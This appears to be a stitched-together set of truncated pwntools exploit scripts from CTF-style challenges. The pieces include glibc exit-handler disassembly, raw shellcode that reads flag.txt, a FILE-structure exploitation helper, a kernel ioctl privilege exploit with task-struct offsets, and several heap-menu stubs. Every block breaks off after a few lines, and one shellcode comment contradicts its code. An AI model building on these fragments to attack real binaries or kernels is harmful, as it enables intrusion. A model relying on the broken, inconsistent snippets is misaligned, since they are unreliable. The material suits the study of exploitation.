```
# Glibc 2.35 Ubuntu 22.04
When exit is called, it passes by here... (Explaining without ASLR)
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp
```
```python
from pwn import *
local = False
libc = ELF("./libc.so.6", checksec = False)
binary = ELF("./vuln", checksec = False)
def menu(n):
    io.recvuntil("\nChoice: ")
    io.sendline(str(n))
```
```python
from pwn import *
import binascii
# open-read-write file
filename = "flag.txt"
body = "\x5f" # pop rdi
body += "\x80\x77" + chr(len(filename)) + "\x41" # xor byte [rdi + 11], 0x41 ; 11 = len(/etc/passwd)
body += "\x48\x31\xf6" # xor rsi, rsi
body += "\x48\x31\xc0" # xor rax, rax
```
```python
# -*- coding:utf-8 -*-
from pwn import *
# based on https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
```
```python
# coding: utf-8
from pwn import *
def menu(s):
    io.recvuntil("> ")
    io.sendline(s)
def write(s):
    menu("w")
    io.sendline(s)
```
```python
# -*- coding:utf-8 -*-
from pwn import *
IOCTL_READ = 901
IOCTL_WRITE = 902
OFFSET_COMM = 0x408
OFFSET_TASKS = 0x210
e = ELF('./vmlinux')
```
```python
# -*- coding:utf-8 -*-
from pwn import *
def menu(n):
    io.recvuntil("Your choice: ")
    io.sendline(str(n))
def malloc(sz, s):
    menu(1)
    io.recvuntil("Size: ")
```
```python
from pwn import *
def init(s):
    io.recvuntil("Input name: ")
    io.sendline(s)
def menu(n):
    io.recvuntil("Choice: \n")
    io.sendline(str(n))
```
```python
from pwn import *
def menu(n):
    r.recvuntil(">> ")
    r.sendline(str(n))
def add(idx, size, payload):
    menu(1)
    r.recvuntil("Enter the index:\n")
    r.sendline(str(idx))
```
```python
from pwn import *
def menu():
    r.recvuntil("option> ")
def create(pos, name, height, weight, power):
    menu()
    r.sendline("1")
    r.recvuntil("Enter the new pokemon ID: ")
    r.sendline(str(pos))
```